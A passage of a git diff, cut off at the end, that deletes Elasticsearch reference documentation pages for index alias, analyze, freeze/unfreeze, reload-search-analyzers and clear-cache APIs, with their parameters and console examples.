-include::indices/flush.asciidoc[] - -include::indices/forcemerge.asciidoc[] - -include::indices/apis/freeze.asciidoc[] - -include::indices/get-component-template.asciidoc[] - -include::indices/get-field-mapping.asciidoc[] - -include::indices/get-index.asciidoc[] - -include::indices/get-alias.asciidoc[] - -include::indices/get-settings.asciidoc[] - -include::indices/get-index-template.asciidoc[] - -include::indices/get-index-template-v1.asciidoc[] - -include::indices/get-mapping.asciidoc[] - -include::indices/alias-exists.asciidoc[] - -include::indices/indices-exists.asciidoc[] - -include::indices/recovery.asciidoc[] - -include::indices/segments.asciidoc[] - -include::indices/shard-stores.asciidoc[] - -include::indices/stats.asciidoc[] - -include::indices/index-template-exists-v1.asciidoc[] - -include::indices/open-close.asciidoc[] - -include::indices/put-index-template.asciidoc[] - -include::indices/put-index-template-v1.asciidoc[] - -include::indices/put-component-template.asciidoc[] - -include::indices/put-mapping.asciidoc[] - -include::indices/refresh.asciidoc[] - -include::indices/rollover-index.asciidoc[] - -include::indices/shrink-index.asciidoc[] - -include::indices/simulate-index.asciidoc[] - -include::indices/simulate-template.asciidoc[] - -include::indices/split-index.asciidoc[] - -include::indices/synced-flush.asciidoc[] - -include::indices/types-exists.asciidoc[] - -include::indices/apis/unfreeze.asciidoc[] - -include::indices/aliases.asciidoc[] - -include::indices/update-settings.asciidoc[] - -include::indices/resolve.asciidoc[] - -include::indices/dangling-indices-list.asciidoc[] - -include::indices/dangling-index-import.asciidoc[] - -include::indices/dangling-index-delete.asciidoc[] diff --git a/docs/reference/indices/add-alias.asciidoc b/docs/reference/indices/add-alias.asciidoc deleted file mode 100644 index c51c35c4ac5..00000000000 --- a/docs/reference/indices/add-alias.asciidoc +++ /dev/null 
@@ -1,136 +0,0 @@ -[[indices-add-alias]] -=== Add index alias API -++++ -Add index alias -++++ - -Creates or updates an index alias. - -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -PUT /my-index-000001/_alias/alias1 ----- -// TEST[setup:my_index] - - -[[add-alias-api-request]] -==== {api-request-title} - -`PUT //_alias/` - -`POST //_alias/` - -`PUT //_aliases/` - -`POST //_aliases/` - - -[[add-alias-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list or wildcard expression of index names -to add to the alias. -+ -To add all indices in the cluster to the alias, -use a value of `_all`. -+ -NOTE: You cannot add <> to an index alias. - -``:: -(Required, string) -Name of the index alias to create or update. - - -[[add-alias-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[add-alias-api-request-body]] -==== {api-request-body-title} - -`filter`:: -(Required, query object) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias-filter] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-routing] - -[[add-alias-api-example]] -==== {api-examples-title} - -[[alias-adding]] -===== Add a time-based alias - -The following request creates an alias, `2030`, -for the `logs_20302801` index. - -[source,console] --------------------------------------------------- -PUT /logs_20302801/_alias/2030 --------------------------------------------------- -// TEST[s/^/PUT logs_20302801\n/] - -[[add-alias-api-user-ex]] -===== Add a user-based alias - -First, create an index, `users`, -with a mapping for the `user_id` field: - -[source,console] --------------------------------------------------- -PUT /users -{ - "mappings" : { - "properties" : { - "user_id" : {"type" : "integer"} - } - } -} --------------------------------------------------- - -Then add the index alias for a specific user, `user_12`: - -[source,console] --------------------------------------------------- -PUT /users/_alias/user_12 -{ - "routing" : "12", - "filter" : { - "term" : { - "user_id" : 12 - } - } -} --------------------------------------------------- -// TEST[continued] - -[[alias-index-creation]] -===== Add an alias during index creation - -You can use the <> -to add an index alias during index creation. - -[source,console] --------------------------------------------------- -PUT /logs_20302801 -{ - "mappings": { - "properties": { - "year": { "type": "integer" } - } - }, - "aliases": { - "current_day": {}, - "2030": { - "filter": { - "term": { "year": 2030 } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/indices/alias-exists.asciidoc b/docs/reference/indices/alias-exists.asciidoc deleted file mode 100644 index 2596fddef6b..00000000000 --- a/docs/reference/indices/alias-exists.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[[indices-alias-exists]] -=== Index alias exists API -++++ -Index alias exists -++++ - -Checks if an index alias exists. 
- -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -HEAD /_alias/alias1 ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000001\/_alias\/alias1\n/] - - -[[alias-exists-api-request]] -==== {api-request-title} - -`HEAD /_alias/` - -`HEAD //_alias/` - - -[[alias-exists-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - -[[alias-exists-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `all`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - - -[[alias-exists-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -Indicates all specified index aliases exist. - - `404`:: -Indicates one or more specified index aliases **do not** exist. - - -[[alias-exists-api-example]] -==== {api-examples-title} - -[source,console] ----- -HEAD /_alias/2030 -HEAD /_alias/20* -HEAD /logs_20302801/_alias/* ----- -// TEST[s/^/PUT logs_20302801\nPUT logs_20302801\/_alias\/2030\n/] diff --git a/docs/reference/indices/aliases.asciidoc b/docs/reference/indices/aliases.asciidoc deleted file mode 100644 index cd45c71d7bc..00000000000 --- a/docs/reference/indices/aliases.asciidoc +++ /dev/null @@ -1,486 +0,0 @@ -[[indices-aliases]] -=== Update index alias API -++++ -Update index alias -++++ - -Adds or removes index aliases. - -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "my-index-000001", "alias" : "alias1" } } - ] -} ----- -// TEST[setup:my_index] - - -[[indices-aliases-api-request]] -==== {api-request-title} - -`POST /_aliases` - - -[[indices-aliases-api-desc]] -==== {api-description-title} - -APIs in Elasticsearch accept an index name when working against a -specific index, and several indices when applicable. The index aliases -API allows aliasing an index with a name, with all APIs automatically -converting the alias name to the actual index name. An alias can also be -mapped to more than one index, and when specifying it, the alias will -automatically expand to the aliased indices. An alias can also be -associated with a filter that will automatically be applied when -searching, and routing values. An alias cannot have the same name as an index. - - -[[indices-aliases-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[indices-aliases-api-request-body]] -==== {api-request-body-title} - -`actions`:: -+ --- -(Required, array of actions) -Set of actions to perform. -Valid actions include: - -`add`:: -Adds an alias to an index. - -`remove`:: -Removes an alias from an index. - -`remove_index`:: -Deletes a concrete index, similar to the <>. Attempts to remove an index alias will fail. - -You can perform these actions on alias objects. -Valid parameters for alias objects include: - -`index`:: -(String) -Wildcard expression of index names -used to perform the action. -+ -If the `indices` parameter is not specified, -this parameter is required. -+ -NOTE: You cannot add <> to an index alias. - -`indices`:: -(Array) -Array of index names -used to perform the action. 
-+ -If the `index` parameter is not specified, -this parameter is required. -+ -NOTE: You cannot add <> to an index alias. - -`alias`:: -(String) -Comma-separated list or wildcard expression of index alias names to -add, remove, or delete. -+ -If the `aliases` parameter is not specified, -this parameter is required for the `add` or `remove` action. - -`aliases`:: -(Array of strings) -Array of index alias names to -add, remove, or delete. -+ -If the `alias` parameter is not specified, -this parameter is required for the `add` or `remove` action. - -`filter`:: -(Optional, query object) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias-filter] -+ -See <> for an example. - -`is_hidden`:: -(Optional, Boolean) -If `true`, the alias will be excluded from wildcard expressions by default, -unless overriden in the request using the `expand_wildcards` parameter, -similar to <>. This property must be set to the -same value on all indices that share an alias. Defaults to `false`. - -`must_exist`:: -(Optional, Boolean) -If `true`, the alias to remove must exist. Defaults to `false`. - -`is_write_index`:: -(Optional, Boolean) -If `true`, assigns the index as an alias's write index. -Defaults to `false`. -+ -An alias can have one write index at a time. -+ -See <> for an example. -+ -[IMPORTANT] -==== -Aliases that do not explicitly set `is_write_index: true` for an index, and -only reference one index, will have that referenced index behave as if it is the write index -until an additional index is referenced. At that point, there will be no write index and -writes will be rejected. -==== - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-routing] -+ -See <> for an example. - -`index_routing`:: -(Optional, string) -Custom <> used -for the alias's indexing operations. -+ -See <> for an example. - -`search_routing`:: -(Optional, string) -Custom <> used -for the alias's search operations. -+ -See <> for an example. --- - - -[[indices-aliases-api-example]] -==== {api-examples-title} - -[[indices-aliases-api-add-alias-ex]] -===== Add an alias - -The following request adds the `alias1` alias to the `test1` index. - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "test1", "alias" : "alias1" } } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - -[[indices-aliases-api-remove-alias-ex]] -===== Remove an alias - -The following request removes the `alias1` alias. - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "remove" : { "index" : "test1", "alias" : "alias1" } } - ] -} --------------------------------------------------- -// TEST[continued] - -[[indices-aliases-api-rename-alias-ex]] -===== Rename an alias - -Renaming an alias is a simple `remove` then `add` operation within the -same API. 
This operation is atomic, no need to worry about a short -period of time where the alias does not point to an index: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "remove" : { "index" : "test1", "alias" : "alias1" } }, - { "add" : { "index" : "test1", "alias" : "alias2" } } - ] -} --------------------------------------------------- -// TEST[continued] - -[[indices-aliases-api-add-multi-alias-ex]] -===== Add an alias to multiple indices - -Associating an alias with more than one index is simply several `add` -actions: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "test1", "alias" : "alias1" } }, - { "add" : { "index" : "test2", "alias" : "alias1" } } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - -Multiple indices can be specified for an action with the `indices` array syntax: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "add" : { "indices" : ["test1", "test2"], "alias" : "alias1" } } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - -To specify multiple aliases in one action, the corresponding `aliases` array -syntax exists as well. - -For the example above, a glob pattern can also be used to associate an alias to -more than one index that share a common name: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "test*", "alias" : "all_test_indices" } } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - -In this case, the alias is a point-in-time alias that will group all -current indices that match, it will not automatically update as new -indices that match this pattern are added/removed. - -It is an error to index to an alias which points to more than one index. - -It is also possible to swap an index with an alias in one, atomic operation. -This means there will be no point in time where the alias points to no -index in the cluster state. However, as indexing and searches involve multiple -steps, it is possible for the in-flight or queued requests to fail -due to a temporarily non-existent index. - -[source,console] --------------------------------------------------- -PUT test <1> -PUT test_2 <2> -POST /_aliases -{ - "actions" : [ - { "add": { "index": "test_2", "alias": "test" } }, - { "remove_index": { "index": "test" } } <3> - ] -} --------------------------------------------------- - -<1> An index we've added by mistake -<2> The index we should have added -<3> `remove_index` is just like <> and will only remove a concrete index. - -[[filtered]] -===== Filtered aliases - -Aliases with filters provide an easy way to create different "views" of -the same index. The filter can be defined using Query DSL and is applied -to all Search, Count, Delete By Query and More Like This operations with -this alias. 
- -To create a filtered alias, first we need to ensure that the fields already -exist in the mapping: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "user": { - "properties": { - "id": { - "type": "keyword" - } - } - } - } - } -} --------------------------------------------------- - -Now we can create an alias that uses a filter on field `user.id`: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "my-index-000001", - "alias": "alias2", - "filter": { "term": { "user.id": "kimchy" } } - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -[[aliases-routing]] -===== Routing - -It is possible to associate routing values with aliases. This feature -can be used together with filtering aliases in order to avoid -unnecessary shard operations. - -The following command creates a new alias `alias1` that points to index -`test`. After `alias1` is created, all operations with this alias are -automatically modified to use value `1` for routing: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "test", - "alias": "alias1", - "routing": "1" - } - } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test\n/] - -It's also possible to specify different routing values for searching -and indexing operations: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "test", - "alias": "alias2", - "search_routing": "1,2", - "index_routing": "2" - } - } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test\n/] - -As shown in the example above, search routing may contain several values -separated by comma. Index routing can contain only a single value. - -If a search operation that uses routing alias also has a routing parameter, an -intersection of both search alias routing and routing specified in the -parameter is used. For example the following command will use "2" as a -routing value: - -[source,console] --------------------------------------------------- -GET /alias2/_search?q=user.id:kimchy&routing=2,3 --------------------------------------------------- -// TEST[continued] - -[[aliases-write-index]] -===== Write index - -It is possible to associate the index pointed to by an alias as the write index. -When specified, all index and update requests against an alias that point to multiple -indices will attempt to resolve to the one index that is the write index. -Only one index per alias can be assigned to be the write index at a time. If no write index is specified -and there are multiple indices referenced by an alias, then writes will not be allowed. - -It is possible to specify an index associated with an alias as a write index using both the aliases API -and index creation API. - -Setting an index to be the write index with an alias also affects how the alias is manipulated during -Rollover (see <>). 
- -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "test", - "alias": "alias1", - "is_write_index": true - } - }, - { - "add": { - "index": "test2", - "alias": "alias1" - } - } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test\nPUT test2\n/] - -In this example, we associate the alias `alias1` to both `test` and `test2`, where -`test` will be the index chosen for writing to. - -[source,console] --------------------------------------------------- -PUT /alias1/_doc/1 -{ - "foo": "bar" -} --------------------------------------------------- -// TEST[continued] - -The new document that was indexed to `/alias1/_doc/1` will be indexed as if it were -`/test/_doc/1`. - -[source,console] --------------------------------------------------- -GET /test/_doc/1 --------------------------------------------------- -// TEST[continued] - -To swap which index is the write index for an alias, the Aliases API can be leveraged to -do an atomic swap. The swap is not dependent on the ordering of the actions. - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "test", - "alias": "alias1", - "is_write_index": false - } - }, { - "add": { - "index": "test2", - "alias": "alias1", - "is_write_index": true - } - } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test\nPUT test2\n/] diff --git a/docs/reference/indices/analyze.asciidoc b/docs/reference/indices/analyze.asciidoc deleted file mode 100644 index d115702c1fa..00000000000 --- a/docs/reference/indices/analyze.asciidoc +++ /dev/null @@ -1,373 +0,0 @@ -[[indices-analyze]] -=== Analyze API -++++ -Analyze -++++ - -Performs <> on a text string -and returns the resulting tokens. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "analyzer" : "standard", - "text" : "Quick Brown Foxes!" -} --------------------------------------------------- - - -[[analyze-api-request]] -==== {api-request-title} - -`GET /_analyze` - -`POST /_analyze` - -`GET //_analyze` - -`POST //_analyze` - - -[[analyze-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Optional, string) -Index used to derive the analyzer. - -If specified, -the `analyzer` or `` parameter overrides this value. - -If no analyzer or field are specified, -the analyze API uses the default analyzer for the index. - -If no index is specified -or the index does not have a default analyzer, -the analyze API uses the <>. --- - - -[[analyze-api-query-params]] -==== {api-query-parms-title} - -`analyzer`:: -+ --- -(Optional, string) -The name of the analyzer that should be applied to the provided `text`. This could be a -<>, or an analyzer that's been configured in the index. - -If this parameter is not specified, -the analyze API uses the analyzer defined in the field's mapping. - -If no field is specified, -the analyze API uses the default analyzer for the index. - -If no index is specified, -or the index does not have a default analyzer, -the analyze API uses the <>. --- - -`attributes`:: -(Optional, array of strings) -Array of token attributes used to filter the output of the `explain` parameter. - -`char_filter`:: -(Optional, array of strings) -Array of character filters used to preprocess characters before the tokenizer. -See <> for a list of character filters. 
- -`explain`:: -(Optional, Boolean) -If `true`, the response includes token attributes and additional details. -Defaults to `false`. -experimental:[The format of the additional detail information is labelled as experimental in Lucene and it may change in the future.] - -`field`:: -+ --- -(Optional, string) -Field used to derive the analyzer. -To use this parameter, -you must specify an index. - -If specified, -the `analyzer` parameter overrides this value. - -If no field is specified, -the analyze API uses the default analyzer for the index. - -If no index is specified -or the index does not have a default analyzer, -the analyze API uses the <>. --- - -`filter`:: -(Optional, Array of strings) -Array of token filters used to apply after the tokenizer. -See <> for a list of token filters. - -`normalizer`:: -(Optional, string) -Normalizer to use to convert text into a single token. -See <> for a list of normalizers. - -`text`:: -(Required, string or array of strings) -Text to analyze. -If an array of strings is provided, it is analyzed as a multi-value field. - -`tokenizer`:: -(Optional, string) -Tokenizer to use to convert text into tokens. -See <> for a list of tokenizers. - -[[analyze-api-example]] -==== {api-examples-title} - -[[analyze-api-no-index-ex]] -===== No index specified - -You can apply any of the built-in analyzers to the text string without -specifying an index. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "analyzer" : "standard", - "text" : "this is a test" -} --------------------------------------------------- - -[[analyze-api-text-array-ex]] -===== Array of text strings - -If the `text` parameter is provided as array of strings, it is analyzed as a multi-value field. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "analyzer" : "standard", - "text" : ["this is a test", "the second text"] -} --------------------------------------------------- - -[[analyze-api-custom-analyzer-ex]] -===== Custom analyzer - -You can use the analyze API to test a custom transient analyzer built from -tokenizers, token filters, and char filters. 
Token filters use the `filter` -parameter: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "keyword", - "filter" : ["lowercase"], - "text" : "this is a test" -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "keyword", - "filter" : ["lowercase"], - "char_filter" : ["html_strip"], - "text" : "this is a test" -} --------------------------------------------------- - -Custom tokenizers, token filters, and character filters can be specified in the request body as follows: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "whitespace", - "filter" : ["lowercase", {"type": "stop", "stopwords": ["a", "is", "this"]}], - "text" : "this is a test" -} --------------------------------------------------- - -[[analyze-api-specific-index-ex]] -===== Specific index - -You can also run the analyze API against a specific index: - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "text" : "this is a test" -} --------------------------------------------------- -// TEST[setup:analyze_sample] - -The above will run an analysis on the "this is a test" text, using the -default index analyzer associated with the `analyze_sample` index. An `analyzer` -can also be provided to use a different analyzer: - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "analyzer" : "whitespace", - "text" : "this is a test" -} --------------------------------------------------- -// TEST[setup:analyze_sample] - -[[analyze-api-field-ex]] -===== Derive analyzer from a field mapping - -The analyzer can be derived based on a field mapping, for example: - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "field" : "obj1.field1", - "text" : "this is a test" -} --------------------------------------------------- -// TEST[setup:analyze_sample] - -Will cause the analysis to happen based on the analyzer configured in the -mapping for `obj1.field1` (and if not, the default index analyzer). - -[[analyze-api-normalizer-ex]] -===== Normalizer - -A `normalizer` can be provided for keyword field with normalizer associated with the `analyze_sample` index. - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "normalizer" : "my_normalizer", - "text" : "BaR" -} --------------------------------------------------- -// TEST[setup:analyze_sample] - -Or by building a custom transient normalizer out of token filters and char filters. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "filter" : ["lowercase"], - "text" : "BaR" -} --------------------------------------------------- - -[[explain-analyze-api]] -===== Explain analyze - -If you want to get more advanced details, set `explain` to `true` (defaults to `false`). It will output all token attributes for each token. -You can filter token attributes you want to output by setting `attributes` option. - -NOTE: The format of the additional detail information is labelled as experimental in Lucene and it may change in the future. 
- -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["snowball"], - "text" : "detailed output", - "explain" : true, - "attributes" : ["keyword"] <1> -} --------------------------------------------------- - -<1> Set "keyword" to output "keyword" attribute only - -The request returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "detail" : { - "custom_analyzer" : true, - "charfilters" : [ ], - "tokenizer" : { - "name" : "standard", - "tokens" : [ { - "token" : "detailed", - "start_offset" : 0, - "end_offset" : 8, - "type" : "", - "position" : 0 - }, { - "token" : "output", - "start_offset" : 9, - "end_offset" : 15, - "type" : "", - "position" : 1 - } ] - }, - "tokenfilters" : [ { - "name" : "snowball", - "tokens" : [ { - "token" : "detail", - "start_offset" : 0, - "end_offset" : 8, - "type" : "", - "position" : 0, - "keyword" : false <1> - }, { - "token" : "output", - "start_offset" : 9, - "end_offset" : 15, - "type" : "", - "position" : 1, - "keyword" : false <1> - } ] - } ] - } -} --------------------------------------------------- - -<1> Output only "keyword" attribute, since specify "attributes" in the request. - -[[tokens-limit-settings]] -===== Setting a token limit -Generating excessive amount of tokens may cause a node to run out of memory. -The following setting allows to limit the number of tokens that can be produced: - -`index.analyze.max_token_count`:: - The maximum number of tokens that can be produced using `_analyze` API. - The default value is `10000`. If more than this limit of tokens gets - generated, an error will be thrown. The `_analyze` endpoint without a specified - index will always use `10000` value as a limit. This setting allows you to control - the limit for a specific index: - - -[source,console] --------------------------------------------------- -PUT /analyze_sample -{ - "settings" : { - "index.analyze.max_token_count" : 20000 - } -} --------------------------------------------------- - - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "text" : "this is a test" -} --------------------------------------------------- -// TEST[setup:analyze_sample] diff --git a/docs/reference/indices/apis/freeze.asciidoc b/docs/reference/indices/apis/freeze.asciidoc deleted file mode 100644 index da2cffa540c..00000000000 --- a/docs/reference/indices/apis/freeze.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[freeze-index-api]] -=== Freeze index API -++++ -Freeze index -++++ - -Freezes an index. - -[[freeze-index-api-request]] -==== {api-request-title} - -`POST //_freeze` - -//[[freeze-index-api-prereqs]] -//==== {api-prereq-title} - -[[freeze-index-api-desc]] -==== {api-description-title} - -A frozen index has almost no overhead on the cluster (except for maintaining its -metadata in memory) and is read-only. Read-only indices are blocked for write -operations, such as <> or <>. See <> and <>. - -The current write index on a data stream cannot be frozen. In order to freeze -the current write index, the data stream must first be -<> so that a new write index is created -and then the previous write index can be frozen. - -IMPORTANT: Freezing an index will close the index and reopen it within the same -API call. This causes primaries to not be allocated for a short amount of time -and causes the cluster to go red until the primaries are allocated again. 
This -limitation might be removed in the future. - -[[freeze-index-api-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the index. - -[[freeze-index-api-examples]] -==== {api-examples-title} - -The following example freezes and unfreezes an index: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_freeze -POST /my-index-000001/_unfreeze --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - diff --git a/docs/reference/indices/apis/reload-analyzers.asciidoc b/docs/reference/indices/apis/reload-analyzers.asciidoc deleted file mode 100644 index 301cd2daeac..00000000000 --- a/docs/reference/indices/apis/reload-analyzers.asciidoc +++ /dev/null @@ -1,174 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[indices-reload-analyzers]] -== Reload search analyzers API - -Reloads an index's <> and their resources. -For data streams, the API reloads search analyzers and resources for the -stream's backing indices. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_reload_search_analyzers --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[indices-reload-analyzers-api-request]] -=== {api-request-title} - -`POST //_reload_search_analyzers` - -`GET //_reload_search_analyzers` - - -[discrete] -[[indices-reload-analyzers-api-desc]] -=== {api-description-title} - -You can use the reload search analyzers API -to pick up changes to synonym files -used in the <> -or <> token filter -of a <>. -To be eligible, -the token filter must have an `updateable` flag of `true` -and only be used in search analyzers. - -[NOTE] -==== -This API does not perform a reload -for each shard of an index. -Instead, -it performs a reload for each node -containing index shards. -As a result, -the total shard count returned by the API -can differ from the number of index shards. - -Because reloading affects every node with an index shard, -its important to update the synonym file -on every data node in the cluster, -including nodes that don't contain a shard replica, -before using this API. -This ensures the synonym file is updated -everywhere in the cluster -in case shards are relocated -in the future. -==== - - -[discrete] -[[indices-reload-analyzers-api-path-params]] -=== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, use `_all` or `*`. - - -[discrete] -[[indices-reload-analyzers-api-query-params]] -=== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - - -[discrete] -[[indices-reload-analyzers-api-example]] -=== {api-examples-title} - -Use the <> -to create an index with a search analyzer -that contains an updateable synonym filter. - -NOTE: Using the following analyzer as an index analyzer results in an error. 
- -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_synonyms": { - "tokenizer": "whitespace", - "filter": [ "synonym" ] - } - }, - "filter": { - "synonym": { - "type": "synonym_graph", - "synonyms_path": "analysis/synonym.txt", <1> - "updateable": true <2> - } - } - } - } - }, - "mappings": { - "properties": { - "text": { - "type": "text", - "analyzer": "standard", - "search_analyzer": "my_synonyms" <3> - } - } - } -} --------------------------------------------------- - -<1> Includes a synonym file. -<2> Marks the token filter as updateable. -<3> Marks the analyzer as a search analyzer. - -After updating the synonym file, -use the <> -to reload the search analyzer -and pick up the file changes. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_reload_search_analyzers --------------------------------------------------- -// TEST[continued] - -The API returns the following response. - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "successful": 2, - "failed": 0 - }, - "reload_details": [ - { - "index": "my-index-000001", - "reloaded_analyzers": [ - "my_synonyms" - ], - "reloaded_node_ids": [ - "mfdqTXn_T7SGr2Ho2KT8uw" - ] - } - ] -} --------------------------------------------------- -// TEST[continued] -// TESTRESPONSE[s/"total": 2/"total": $body._shards.total/] -// TESTRESPONSE[s/"successful": 2/"successful": $body._shards.successful/] -// TESTRESPONSE[s/mfdqTXn_T7SGr2Ho2KT8uw/$body.reload_details.0.reloaded_node_ids.0/] diff --git a/docs/reference/indices/apis/unfreeze.asciidoc b/docs/reference/indices/apis/unfreeze.asciidoc deleted file mode 100644 index 111a335f378..00000000000 --- a/docs/reference/indices/apis/unfreeze.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[unfreeze-index-api]] -=== Unfreeze index API -++++ -Unfreeze index -++++ - -Unfreezes an index. - -[[unfreeze-index-api-request]] -==== {api-request-title} - -`POST //_unfreeze` - -//[[unfreeze-index-api-prereqs]] -//==== {api-prereq-title} - -[[unfreeze-index-api-desc]] -==== {api-description-title} - -When a frozen index is unfrozen, the index goes through the normal recovery -process and becomes writeable again. See <> and <>. - -IMPORTANT: Freezing an index will close the index and reopen it within the same -API call. This causes primaries to not be allocated for a short amount of time -and causes the cluster to go red until the primaries are allocated again. This -limitation might be removed in the future. - -[[unfreeze-index-api-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the index. - -[[unfreeze-index-api-examples]] -==== {api-examples-title} - -The following example freezes and unfreezes an index: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_freeze -POST /my-index-000001/_unfreeze --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] diff --git a/docs/reference/indices/clearcache.asciidoc b/docs/reference/indices/clearcache.asciidoc deleted file mode 100644 index 6a71f289655..00000000000 --- a/docs/reference/indices/clearcache.asciidoc +++ /dev/null @@ -1,152 +0,0 @@ -[[indices-clearcache]] -=== Clear cache API -++++ -Clear cache -++++ - -Clears the caches of one or more indices. 
For data streams, the API clears the -caches of the stream's backing indices. - -[source,console] ----- -POST /my-index-000001/_cache/clear ----- -// TEST[setup:my_index] - - -[[clear-cache-api-request]] -==== {api-request-title} - -`POST //_cache/clear` - -`POST /_cache/clear` - - -[[clear-cache-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[clear-cache-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`fielddata`:: -+ --- -(Optional, Boolean) -If `true`, -clears the fields cache. - -Use the `fields` parameter -to clear the cache of specific fields only. --- - -`fields`:: -+ --- -(Optional, string) -Comma-separated list of field names -used to limit the `fielddata` parameter. - -Defaults to all fields. - -NOTE: This parameter does *not* support objects -or field aliases. --- - - -`index`:: -(Optional, string) -Comma-separated list of index names -used to limit the request. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`query`:: -(Optional, Boolean) -If `true`, -clears the query cache. - -`request`:: -(Optional, Boolean) -If `true`, -clears the request cache. - - -[[clear-cache-api-example]] -==== {api-examples-title} - - -[[clear-cache-api-specific-ex]] -===== Clear a specific cache - -By default, -the clear cache API clears all caches. -You can clear only specific 